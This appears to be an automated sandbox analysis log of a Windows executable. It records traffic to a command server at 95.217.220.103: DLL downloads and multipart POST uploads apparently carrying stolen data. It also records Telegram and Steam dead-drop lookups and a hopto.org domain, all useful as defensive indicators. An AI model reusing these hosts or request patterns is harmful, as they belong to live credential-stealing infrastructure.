Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEGDBAEBFIIDHJJJEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 109281Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 107.191.36.218
Source: unknown	TCP traffic detected without corresponding DNS query: 107.191.36.218
Source: unknown	TCP traffic detected without corresponding DNS query: 107.191.36.218
Source: unknown	TCP traffic detected without corresponding DNS query: 107.191.36.218
Source: unknown	TCP traffic detected without corresponding DNS query: 107.191.36.218
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00926963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_00926963

Source: global traffic	HTTP traffic detected: GET /fun88rockskek HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 107.191.36.218Connection: Keep-AliveCache-Control: no-cache

Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: -Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 255Connection: Keep-AliveCache-Control: no-cache

Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.191.36.218/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.191.36.218/0
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.191.36.218/b
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.191.36.218/r
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.191.36.218:80
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.ECBGCBFHIJJK
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.FHIJJK
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgJJK
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoBFHIJJK
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
